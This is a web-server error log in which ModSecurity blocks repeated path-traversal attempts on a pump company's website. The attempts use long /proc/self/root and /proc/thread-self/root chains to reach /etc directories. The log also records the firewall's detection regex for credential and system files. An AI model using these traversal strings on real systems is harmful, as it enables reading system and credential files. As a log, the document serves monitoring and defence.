[Wed Mar 18 09:45:28.879687 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:42962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeaAkwaGbbGflqUZAFzgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:53.419172 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:58640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqegcdf6f5d65gmYZTKmwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:12.324872 2026] [mime_magic:error] [pid 30077:tid 140411582465792] (70014)End of file found: [client 57.141.18.62:56844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:46:22.275864 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:41728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqenuoXxyEfFpUF8f9kLgAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:23.602807 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:43282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqenymAPhZkrhU8w4lizwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:26.388316 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:43294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeoimAPhZkrhU8w4li0wAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:27.883164 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:43306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeo9a6ubjKNq_cu4aO2gAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:29.654821 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:43322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqepew_le52K8_3pV3VawAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:41.159146 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.243.128:51126] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqescdf6f5d65gmYZTKvgAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:43.535678 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:37110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqes0zinOy1jxa1j4cKNwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:44.837625 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:37114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqetMdf6f5d65gmYZTKxAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:44.906771 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:56694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqetPu8EFLIOrSqIpv7CgAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:47.197072 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:37118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqetimAPhZkrhU8w4li2QAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:46:52.115805 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:37128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqevCmAPhZkrhU8w4li5wAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:47:05.015400 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:39070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeySmAPhZkrhU8w4li_wAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:47:13.981555 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:38556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqe0SmAPhZkrhU8w4ljCQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:47:15.146346 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:59246] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/boot
[Wed Mar 18 09:47:20.823550 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:39020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqe2Na6ubjKNq_cu4aO-AAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:47:25.616148 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:52714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqe3cdf6f5d65gmYZTK4gAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:47:30.051215 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:52730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqe4ta6ubjKNq_cu4aO_wAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:47:34.815408 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:34446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqe5tY0UrI5A3LftIyarQAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:48:01.122553 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:47748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqfAew_le52K8_3pV3VvQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:48:19.285573 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.244.43:52160] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqfEwkwaGbbGflqUZAGNQAAAMA"]
[Wed Mar 18 09:48:22.506926 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.228.61:42012] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqfFsdf6f5d65gmYZTLFAAAAs4"]
